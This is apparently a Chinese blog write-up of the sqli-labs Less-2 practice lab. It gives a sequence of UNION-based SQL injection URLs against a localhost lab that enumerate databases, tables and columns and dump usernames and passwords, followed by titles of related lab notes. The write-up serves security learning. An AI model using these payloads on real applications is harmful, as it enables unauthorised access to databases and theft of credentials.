2. 程式人生 > 其它 >sqli-labs闖關筆記-less2-數字型注入

sqli-labs闖關筆記-less2-數字型注入

阿新 發佈:2021-11-17

開啟Less-2中index.php檔案,在第32行$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";後面新增如下兩行:

echo $sql; 列印輸出的sql語句
echo "<br/>";列印換行符

1、檢視是否有注入,經報錯顯示是字元型注入,後面進行注入時不需要加單引號。

2、檢視有多少列,使用二分法,直到查到準確的列,現在表裡有3列。

http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3 --

3、檢視哪些資料可以回顯

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3 --

4、檢視資料庫security

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,schema_name from information_schema.schemata --

顯示所有資料庫名

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --

5、檢視資料庫

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,database() --

6、檢視資料庫security的所有表

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--

7、檢視所有列資訊

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--

8、得到帳號密碼

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--

相關推薦

sqli-labs筆記-less2-字型注入

開啟Less-2中index.php檔案,在第32行$sql=\"SELECT * FROM users WHERE id=\'$id\' LIMIT 0,1\";後面新增如下兩行:

sqli-labs筆記-less38-53-堆疊注入

Stacked injections:堆疊注入。從名詞的含義就可以看到應該是一堆sql語句(多條)一起執行。而在真實的運用中也是這樣的,我們知道在mysql中,主要是命令列中,每一條語句結尾加 ; 表示語句結束。這樣我們就想到了是

sqli-labs筆記-目錄

下面是sqli-labs安裝程式中給出的結構。 從介面上可以看出此專案共分成四個部分,如下圖:

sqli-labs筆記-less1-20---介面報錯分析

less-1——基於單引號的字元型注入 SELECT * FROM users WHERE id=\'1\'\' LIMIT 0,1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right sy

sqli-labs筆記-less25-less25a-雙寫繞WAF

less25 1. http://localhost:8001/sqli-labs/less-25/?id=1顯示正常2. http://localhost:8001/sqli-labs/less-25/?id=1\' 此時報錯,說明存在漏洞3. http://localhost:8001/sqli-labs/less-25/?id=1\' order by 3 -

sqli-labs(11-20)

sqli-labs(11-20) less-11 1、11-20都為post傳遞,我們可以使用burp抓包來修改post提交的資料。

sqli-labs第一:基於錯誤的GET單引號字元型注入

點進去題目:提示我們輸入題目id,第一題,所以我們輸入?id=1,回車即可。如圖:首先可以判斷這裡接受的是一個GET請求,先在1後面加一個’ 發現報錯,說明這裡沒有過濾掉引號,所以這裡是一個注入點 SQL注入

SQLi-LABS 第一 SQL注入 總結

SQLi-LABS 第一 SQL注入 總結 關卡簡介 關卡提示:GET-Error based- Single quotes-String 注入位置:GET

Sqli-labs-master學習筆記

本次學習主要是為了深入漏洞和滲透原理。 Less-1GET - Error based - Single quotes - String(基於錯誤的GET單引號字元型注入)

sqli-labs less13-20(各種post型頭部注入)

less-13 POST型雙查詢注入 less-14 POST型雙查詢注入 less-15 POST型布林注入 less-16 POST型布林注入

SQL注入字型注入(手工)(1)

產生注入漏洞條件 引數使用者可控:前端傳給後端的引數內容是可以被使用者控制的

sqli-labs第七

1、首先判斷注入點 正常顯示是這樣的不正常顯示是這樣的猜到最後,注入點是字元型,單引號加兩個小括號,?id=1’)) – -因為它只有正常顯示和不正常顯示兩種狀態,並且也沒有MySQL的報錯資訊。正常來說,這

sqli-labs靶場11-12(基於POST聯合查詢)

1:GET 2:POST 3:Head 4:Put 5:Delete 6:Connect 7:Options 8:Trace 那麼這裡是典型的POST注入,那麼注入點就是在POST資料中,而POST請求往往代表著使用者向伺服器提交了大量的資料請求,行為有包括檔案上傳,

sqli-labs靶場第十五

第十五沒什麼特殊的,只是單引號閉合而已。

sqli-labs學習筆記(基礎篇)

sqli-labs學習筆記(基礎篇) 目錄sqli-labs學習筆記(基礎篇)less-1 單引號less-2 無引號less-3 括號加引號less-4 括號less-5 單引號布林盲注less-6 雙引號布林盲注less-7 寫shellless-8 無報錯的布林盲注less-9 單

Sqli-labs 第2 SQL注入 Writeup

Sqli-labs 第2 SQL注入 Writeup 關卡簡介 關卡提示:GET-Error based - Intiger based 注入位置:GET

Sqli-labs 第3 SQL注入 Writeup

Sqli-labs 第3 SQL注入 Writeup 關卡簡介 關卡提示:GET -Error based- Single quotes with twist- string

Python 學習筆記 基本資料型別內建方法之 字型

基本資料型別: 數值型別: int, float,complex 數值型int、float: 作用:數字型別主要就是用來做數學運算與比較運算,因此數字型別除了與運算子結合使用之外,並無需要掌握的內建方法;

Sqli-labs-master Less11-Less20學習筆記

Less-11POST - Error Based - Single quotes- String (基於錯誤的POST型單引號字元型注入) 開啟Brup Suite,設定代理,在登陸介面隨機輸入admin進行登入,抓包:

Sqli-Labs Less12:POST注入

開啟bp抓包 傳送至Repeater,新增 \\ 進行測試 根據報錯:222\") 猜測查詢語句: select uname,passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)